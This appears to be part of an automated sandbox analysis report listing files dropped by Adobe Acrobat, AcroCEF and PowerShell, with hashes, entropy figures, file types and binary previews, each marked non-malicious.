                                                        SHA-256:E98A2BD1FB0F6E7A9279CACD37ADDBC598A0F171F56947F3F575938C91AB1A23
                                                        SHA-512:3E48514BFE488C781202EF1E8C7583D4217E3119B9F63B975499165C7F73517910FD5C3CEE2605205AC3C9E5E999052DF8996D019BE6D924324D96BACD6C25B3
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:SQLite Rollback Journal
                                                        Category:dropped
                                                        Size (bytes):8720
                                                        Entropy (8bit):1.6092243087803728
                                                        Encrypted:false
                                                        SSDEEP:48:7MpKUUUUUUUUUUvvR9H9vxFGiDIAEkGVvcqFl2GL7ms5:7bUUUUUUUUUUHFGSIt2KVms5
                                                        MD5:FA4726851A8E923D8D6F56F6DA6D5A84
                                                        SHA1:BC839CADF2C7869B0FA23AF37066276106F9D3BC
                                                        SHA-256:C441F1A6CDC3811CE350633CE7A5B62236243703CFFA34B6B5DAB5BE420AD530
                                                        SHA-512:93BF483C09FD5741C2729951CE02F27BC36F18BF2667EB474FF7B8086D12269B87DB677F778B671CC9122F5D0786BDB90D094897B015709D43932F1D586267D2
                                                        Malicious:false
                                                        Preview:.... .c.....}."......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................f.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):66726
                                                        Entropy (8bit):5.392739213842091
                                                        Encrypted:false
                                                        SSDEEP:768:RNOpblrU6TBH44ADKZEgbfSXfVxwcq31ewOfV6pKpAkdAYyu:6a6TZ44ADEbfkfVxwcJGk+K
                                                        MD5:F694D2454D93844AB2E1F02894E1D05E
                                                        SHA1:EAD52F2E56EF9522647117789B57638C4DC484D4
                                                        SHA-256:0FD795029C4A1C83285E2BD120761FFFD3471B5AABDC3A6676DACEC579E08291
                                                        SHA-512:C34ACCC4D93E6AD7FE8C47C5A99E75D706B6F9A0AA541009768A5AA8A732301E5F247BAEE092DDC4CD3750AF83E3296A1F9CA4411C45EBCD690822A7C3AF4E7B
                                                        Malicious:false
                                                        Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):64
                                                        Entropy (8bit):0.34726597513537405
                                                        Encrypted:false
                                                        SSDEEP:3:Nlll:Nll
                                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                        Malicious:false
                                                        Preview:@...e...........................................................
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):64
                                                        Entropy (8bit):0.34726597513537405
                                                        Encrypted:false
                                                        SSDEEP:3:Nlll:Nll
                                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                        Malicious:false
                                                        Preview:@...e...........................................................
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:PDF document, version 1.7, 1 pages
                                                        Category:dropped
                                                        Size (bytes):20619
                                                        Entropy (8bit):7.649327193250863
                                                        Encrypted:false
                                                        SSDEEP:384:xHqducLqFl02IpSB3m7n3cG1CBGJSYQLjv/oRvIjUN7KByQnLLG1eeep3:xHqISqFu63ex+GJSYQr/eIjUpKByQnLV
                                                        MD5:21917A7EC0B49FFEC094E97E27216ACA
                                                        SHA1:DE8B550B7982AA13BAAAE4B1470229FB8302C807
                                                        SHA-256:C9A346E7F1345EA239E5395D8A9856F839D5927B5A9F3F4A1C7E1AB869423DE5
                                                        SHA-512:929E73C7B09D87AC8A714862C2E317967812DBD072D2D0416251BE238FCE8E7089FD535FDDF02466FB108F6526C1B85FB85D5788A1E93B35DCBAAEF0D359D8B7
                                                        Malicious:false
                                                        Preview:%PDF-1.7.%.....1 0 obj .<<./ColorSpace /DeviceRGB./Subtype /Image./Height 441./Filter /DCTDecode./Type /XObject./DecodeParms .<<./Quality 80.>>./Width 626./BitsPerComponent 8./Length 19772.>>.stream......C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((........r.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...8..O.z....-?.......O..P.|....Tyi.....P.|....Tyi.....P.|....Tyi.....P.|....Tyi.....P.|....Tyi.....P.|....Tyi.....P.|....Tyi.....P.|....Tyi.....P.|....Tyi.....P.|....Tyi.....P.|....Tyi.....P.|....
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):246
                                                        Entropy (8bit):3.493870954423123
                                                        Encrypted:false
                                                        SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8g4AFKw:Qw946cPbiOxDlbYnuRKL4qH
                                                        MD5:F3615F85B2AE897062BC89FCF6BEA8EB
                                                        SHA1:F14A16DE958E0652AC4F6703625978C026F815C0
                                                        SHA-256:239FF36F3E562B1E66B4130442429F77E6339C05A9ABD0FAD57564E063B818A0
                                                        SHA-512:95E61EA493533FBF197936F59465360F972546995876123E8685683725FE2138E12D1CD0F0BABCC6EDF000928AB5717A2A8F5529AB1CB41786C36F7125392E8A
                                                        Malicious:false
                                                        Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .0.2./.0.2./.2.0.2.4. . .1.1.:.1.9.:.2.9. .=.=.=.....
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:ASCII text, with very long lines (393)
                                                        Category:dropped
                                                        Size (bytes):16525
                                                        Entropy (8bit):5.345946398610936
                                                        Encrypted:false
                                                        SSDEEP:384:zHIq8qrq0qoq/qUILImCIrImI9IWdFdDdoPtPTPtP7ygyAydy0yGV///X/J/VokV:nNW
                                                        MD5:8947C10F5AB6CFFFAE64BCA79B5A0BE3
                                                        SHA1:70F87EEB71BA1BE43D2ABAB7563F94C73AB5F778
                                                        SHA-256:4F3449101521DA7DF6B58A2C856592E1359BA8BD1ACD0688ECF4292BA5388485
                                                        SHA-512:B76DB9EF3AE758F00CAF0C1705105C875838C7801F7265B17396466EECDA4BCD915DA4611155C5F2AD1C82A800C1BEC855E52E2203421815F915B77AA7331CA0
                                                        Malicious:false
                                                        Preview:SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:088+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):15114
                                                        Entropy (8bit):5.3775134181152975
                                                        Encrypted:false
                                                        SSDEEP:384:aq7WDf67e1HNt9oQ2UHBv8x5lCKC3bBs3oRtrtPtrtceDSdnM9ld+VgX8Xej3t+M:I/hpZ3
                                                        MD5:D374D66B944036B29941F58069B7E46A
                                                        SHA1:2B29AE9CEF4CDBD14B2DD9C9C4F546B58225AAF5
                                                        SHA-256:9EA9C1889E1DC4C83BDD74F3DF9EDE233AA2667630A8FF4EDAC87D6C36F7B769
                                                        SHA-512:7ABAC809361335FD887E7B427C6AB6761415820F7FECBB27ED8BE69BDFD3C1CDE4518B1EFFD0A6057101C736DE9DD28B17AF9736FB4CC789F239EC5D280C4E3D
                                                        Malicious:false
                                                        Preview:SessionID=4790c744-23d7-4f59-9d63-6cfda9ebcc4d.1706869160506 Timestamp=2024-02-02T11:19:20:506+0100 ThreadID=6780 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=4790c744-23d7-4f59-9d63-6cfda9ebcc4d.1706869160506 Timestamp=2024-02-02T11:19:20:506+0100 ThreadID=6780 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=4790c744-23d7-4f59-9d63-6cfda9ebcc4d.1706869160506 Timestamp=2024-02-02T11:19:20:507+0100 ThreadID=6780 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=4790c744-23d7-4f59-9d63-6cfda9ebcc4d.1706869160506 Timestamp=2024-02-02T11:19:20:507+0100 ThreadID=6780 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=4790c744-23d7-4f59-9d63-6cfda9ebcc4d.1706869160506 Timestamp=2024-02-02T11:19:20:507+0100 ThreadID=6780 Component=ngl-lib_NglAppLib Description="SetConf
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):29752
                                                        Entropy (8bit):5.383308546729959
                                                        Encrypted:false
                                                        SSDEEP:768:anddBuBYZwcfCnwZCnR8Bu5hx18HoCnLlAY+iCBuzhLCnx1CnPrRRFS10l8gT2r5:F
                                                        MD5:01C692F76994870D83B0870CA0AF2F88
                                                        SHA1:E53F9C3449A3BECE1BABDEC207FBF3AF5E01733F
                                                        SHA-256:3B5DA121BBC23DCD7D50686461400AFC561149F576B7AA499473AC7B9F137FBD
                                                        SHA-512:918021C8D6F8F3AC59600049D89617A05435B5E42C469B012ED94E8D5DCA4E1EB461CE4FEEA70CAF9E07618D87D39BADDC561C3919F94328F774D46288FFCA22
                                                        Malicious:false
                                                        Preview:03-10-2023 12:50:40:.---2---..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Starting NGL..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..03-10-2023 12:50:40:.Closing File..03-10-
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                        Category:dropped
                                                        Size (bytes):1419751
                                                        Entropy (8bit):7.976496077007677
                                                        Encrypted:false
                                                        SSDEEP:24576:/xA7owWLaGZDwYIGNPJodpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JVwWLaGZDwZGk3mlind9i4ufFXpAXkru
                                                        MD5:18E3D04537AF72FDBEB3760B2D10C80E
                                                        SHA1:B313CD0B25E41E5CF0DFB83B33AB3E3C7678D5CC
                                                        SHA-256:BBEF113A2057EE7EAC911DC960D36D4A62C262DAE5B1379257908228243BD6F4
                                                        SHA-512:2A5B9B0A5DC98151AD2346055DF2F7BFDE62F6069A4A6A9AB3377B644D61AE31609B9FC73BEE4A0E929F84BF30DA4C1CDE628915AC37C7542FD170D12DE41298
                                                        Malicious:false
                                                        Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                        Category:dropped
                                                        Size (bytes):758601
                                                        Entropy (8bit):7.98639316555857
                                                        Encrypted:false
                                                        SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                        MD5:3A49135134665364308390AC398006F1
                                                        SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                        SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                        SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                        Malicious:false
                                                        Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                        Category:dropped
                                                        Size (bytes):1407294
                                                        Entropy (8bit):7.97605879016224
                                                        Encrypted:false
                                                        SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo
                                                        MD5:A0CFC77914D9BFBDD8BC1B1154A7B364
                                                        SHA1:54962BFDF3797C95DC2A4C8B29E873743811AD30
                                                        SHA-256:81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685
                                                        SHA-512:74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE
                                                        Malicious:false
                                                        Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                        Category:dropped
                                                        Size (bytes):386528
                                                        Entropy (8bit):7.9736851559892425
                                                        Encrypted:false
                                                        SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                        MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                        SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                        SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                        SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                        Malicious:false
                                                        Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):6221
